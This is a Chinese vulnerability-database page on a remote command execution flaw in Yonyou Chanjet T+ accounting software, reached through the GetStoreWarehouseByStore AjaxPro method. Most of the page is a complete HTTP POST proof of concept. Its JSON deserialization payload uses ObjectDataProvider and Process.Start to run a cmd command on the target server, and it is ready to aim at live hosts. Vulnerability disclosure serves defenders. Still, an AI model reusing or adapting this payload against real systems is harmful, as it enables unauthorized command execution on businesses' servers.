用友畅捷通 T+ GetStoreWarehouseByStore 方法远程命令执行漏洞

日期: 2023-08-11 | 影响软件: 畅捷通T+ | POC: 已公开

漏洞描述

用友畅捷通T+ 是一款智慧、灵动、时尚的基于互联网时代的企业管理软件。畅捷通T+存在远程命令执行漏洞，攻击者可利用该漏洞在目标服务器上执行任意命令。

PoC代码

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-Ajaxpro-Method: GetStoreWarehouseByStore
Content-Type: text/plain
Content-Length: 553

{
 "storeID":{
  "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
   "StartInfo":{
    "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c ping -n 3 x"
   }
  }
 }
}

漏洞描述

PoC代码

相关漏洞推荐

畅捷通T+ ME_MemberIntegral_IntegralAdjust 存在反序列化漏洞 无POC

畅捷通T+ getdecallusers信息泄露漏洞 无POC

CNVD-2022-60632: 畅捷通T+ SetupAccount 任意文件上传 POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

畅捷通T+ ME_MemberIntegral_IntegralAdjust 存在反序列化漏洞无POC

畅捷通T+ getdecallusers信息泄露漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC